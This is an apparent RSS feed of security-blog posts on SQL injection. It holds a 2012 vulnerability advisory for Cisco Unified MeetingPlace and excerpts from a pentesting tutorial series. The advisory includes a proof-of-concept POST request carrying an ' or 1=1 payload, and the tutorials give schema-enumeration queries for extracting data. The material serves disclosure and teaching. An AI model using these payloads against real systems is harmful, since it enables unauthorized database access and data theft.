<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>SQLi on Insinuator.net - Bold Statements</title>
    <link>https://insinuator.net/tags/sqli/</link>
    <description>Recent content in SQLi on Insinuator.net - Bold Statements</description>
    <generator>Hugo</generator>
    <language>en-us</language>
    <lastBuildDate>Thu, 08 Nov 2012 00:00:00 +0000</lastBuildDate>
    <atom:link href="https://insinuator.net/tags/sqli/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>SQL Injection in Cisco MeetingPlace</title>
      <link>https://insinuator.net/2012/11/sql-injection-in-cisco-meetingplace/</link>
      <pubDate>Thu, 08 Nov 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/11/sql-injection-in-cisco-meetingplace/</guid>
      <description>&lt;p&gt;Cisco has released a &lt;a href=&#34;http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20121031-mp&#34;&gt;security advisory&lt;/a&gt; for a vulnerability we discovered last year.&lt;br&gt;&#xA;For comparison here is our original advisory to cisco:&lt;/p&gt;&#xA;&lt;h5 id=&#34;security-advisory-for-cisco-unified-communications-solution&#34;&gt;Security Advisory for Cisco Unified Communications Solution&lt;/h5&gt;&#xA;&lt;h5 id=&#34;release-date-1182012-author-daniel-mende&#34;&gt;Release Date: 11/8/2012 Author: Daniel Mende&lt;/h5&gt;&#xA;&lt;h5 id=&#34;1-summary-multiple-critical-sql-injections-exist-in-cisco-unified-meeting-place&#34;&gt;1 SUMMARY Multiple critical SQL injections exist in Cisco unified meeting place.&lt;/h5&gt;&#xA;&lt;h5 id=&#34;2-affected-products-the-following-products-have-been-tested-as-vulnerable-so-far-cisco-unified-meetingplace-with-the-following-modules--meetingplace-agent-7119--meetingplace-audio-service-7118--meetingplace-gateway-sim-7112--meetingplace-replication-service-7119--meetingplace-master-service-7118--meetingplace-extension-7118--meetingplace-authentication-filter-7118&#34;&gt;2 AFFECTED PRODUCTS The following Products have been tested as vulnerable so far: Cisco Unified Meetingplace with the following modules: • MeetingPlace Agent 7.1.1.9 • MeetingPlace Audio Service 7.1.1.8 • MeetingPlace Gateway SIM 7.1.1.2 • MeetingPlace Replication Service 7.1.1.9 • MeetingPlace Master Service 7.1.1.8 • MeetingPlace Extension 7.1.1.8 • MeetingPlace Authentication Filter 7.1.1.8&lt;/h5&gt;&#xA;&lt;h5 id=&#34;3-details-the-following-parameters-are-affected-httpipmpwebscriptsmpxdll-post-parameter-wcrecurmtgid&#34;&gt;3 DETAILS The following parameters are affected: http://$IP/mpweb/scripts/mpx.dll [POST Parameter wcRecurMtgID]&lt;/h5&gt;&#xA;&lt;h5 id=&#34;4-vulnerability-scoring-the-severity-rating-based-on-cvss-version-2-base-vector-avn--acl--aus--cp--ip--ap-cvss-version-2-score-65-severity-low&#34;&gt;4 VULNERABILITY SCORING The severity rating based on CVSS Version 2: Base Vector: (AV:N / AC:L / Au:S / C:P / I:P / A:P) CVSS Version 2 Score: 6.5 Severity: Low&lt;/h5&gt;&#xA;&lt;h5 id=&#34;5-proof-of-concept-post-mpwebscriptsmpxdll-http11-host-10xxx-user-agent-mozilla50-accept-texthtmlapplicationxhtmlxmlapplicationxmlq09q08-accept-language-en-usenq05-accept-encoding-gzip-deflate-accept-charset-iso-8859-1utf-8q07q07-proxy-connection-keep-alive-referer-http10xxxmpwebscriptsmpxdll-cookie-cookiestrue-content-type-applicationx-www-form-urlencoded-content-length-571&#34;&gt;5 PROOF OF CONCEPT POST /mpweb/scripts/mpx.dll HTTP/1.1 Host: 10.X.X.X User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://10.X.X.X/mpweb/scripts/mpx.dll Cookie: cookies=true Content-Type: application/x-www-form-urlencoded Content-Length: 571&lt;/h5&gt;&#xA;&lt;h5 id=&#34;sessionida40490a1-ab17-4c1e-ba4a-e3c5c90f62ca1ed59e5c-a774-4546-8683--aeb15d6fbd0d55931857-6296-48ec-9434-3231c683c47dadadfjadlkenmfhmplaihgkddg-wcmeetingidwcrecurmtgid-or-11-url0wcbasetpltxt0startseiteurl1-txt1url2txt2url3txt3url4txt4url5txt5mtgcattosearch-28all2bcategories29ml_publicpostedyesmtgidtosearch0000007schedulerid-wcrequestwchashformtypelistmeetingswcstate3stplwcfindmtgtplftpl-wcfindmtgtplml_listmt_todayml_endtime_monthml_endtime_dayml_end-time_yearml_showcontmtgsyessp_vlanguagelang999i00&#34;&gt;SessionID=A40490A1-AB17-4C1E-BA4A-E3C5C90F62CA.1ED59E5C-A774-4546-8683- AEB15D6FBD0D.55931857-6296-48ec-9434-3231c683c47d.ADadfjadlkeNmFhmplaihgkdDg &amp;amp;wcMeetingID=&amp;amp;wcRecurMtgID=‘ or 1=1 —&amp;amp;URL0=wcBase.tpl&amp;amp;TXT0=Startseite&amp;amp;URL1=&amp;amp; TXT1=&amp;amp;URL2=&amp;amp;TXT2=&amp;amp;URL3=&amp;amp;TXT3=&amp;amp;URL4=&amp;amp;TXT4=&amp;amp;URL5=&amp;amp;TXT5=&amp;amp;MtgCatToSearch= %28all%2Bcategories%29&amp;amp;ML_PublicPosted=Yes&amp;amp;MtgIDToSearch=0000007&amp;amp;SchedulerID= &amp;amp;wcRequest=&amp;amp;wcHash=&amp;amp;FormType=listmeetings&amp;amp;wcState=3&amp;amp;STPL=wcFindMtg.tpl&amp;amp;FTPL= wcFindMtg.tpl&amp;amp;ML_List=MT_Today&amp;amp;ML_EndTime_Month=&amp;amp;ML_EndTime_Day=&amp;amp;ML_End Time_Year=&amp;amp;ML_ShowContMtgs=Yes&amp;amp;SP_VLanguage=lang999i00&lt;/h5&gt;&#xA;&lt;p&gt; &lt;/p&gt;</description>
    </item>
    <item>
      <title>SQL Injection Testing for Business Purposes Part 3</title>
      <link>https://insinuator.net/2012/06/sql-injection-testing-for-business-purposes-part-3/</link>
      <pubDate>Wed, 13 Jun 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/06/sql-injection-testing-for-business-purposes-part-3/</guid>
      <description>&lt;h2 id=&#34;extract-the-data&#34;&gt;Extract the data&lt;/h2&gt;&#xA;&lt;p&gt;If you want to extract some data from a database you first need to gather knowledge about the internal structure of the database.&lt;/p&gt;&#xA;&lt;p&gt;One of the first steps (after determining the database type) is enumerating the available tables and the corresponding columns. Most database systems have a meta database called information_schema. By querying this database it is possible to get information about the internal structure of the installed databases. For example you could get the tables and their corresponding columns in MS SQL and MySQL by injecting “&lt;code&gt;SELECT table_name, column_name FROM information_schema.columns&lt;/code&gt;“. Oracle databases have their own meta tables, so you have to handle them differently. For getting the same output in Oracle, you have to query the all_tab_columns table (or user_tab_columns if you only want to search in the currently selected database). If the found vulnerability only allows to receive a single column (or if it is too complicated to identify two columns in the server response) you could concatenate the columns to one single string, e.g. in Oracle: “&lt;code&gt;SELECT table_name||&#39;:&#39;||column_name FROM all_tab_columns&lt;/code&gt;“.&lt;/p&gt;</description>
    </item>
    <item>
      <title>SQL Injection Testing for Business Purposes Part 2</title>
      <link>https://insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-2/</link>
      <pubDate>Mon, 28 May 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-2/</guid>
      <description>&lt;h2 id=&#34;take-care-of-the-database&#34;&gt;Take Care of the Database&lt;/h2&gt;&#xA;&lt;p&gt;There are some database specifics, every pentester should be aware of, when testing for and exploiting SQLi vulnerabilities. Besides the different string concatenation variants already covered above, there are some other specifics that have to be considered and might turn out useful in some circumstances. For example with Oracle Databases, every SELECT statement needs a following FROM statement even if the desired data is not stored within a database. So when trying to extract e.g. the DB username using a UNION SELECT statement, the DUAL table may be utilized, which should always be available. Another point, if dealing with MySQL, is the possibility to simplify the classic payload&lt;/p&gt;</description>
    </item>
    <item>
      <title>SQL Injection Testing for Business Purposes Part 1</title>
      <link>https://insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-1/</link>
      <pubDate>Mon, 14 May 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-1/</guid>
      <description>&lt;h2 id=&#34;introduction&#34;&gt;Introduction&lt;/h2&gt;&#xA;&lt;p&gt;SQL injection attacks have been well known for a long time and many people think that developers should have fixed these issues years ago, but doing web application pentests almost all the time, we have a slightly different view. Many SQL injection problems  potentially remain undetecteddue to a lack of proper test methodology, so we would like to share our approach and experience and help others in identifying these issues.&lt;/p&gt;</description>
    </item>
  </channel>
</rss>
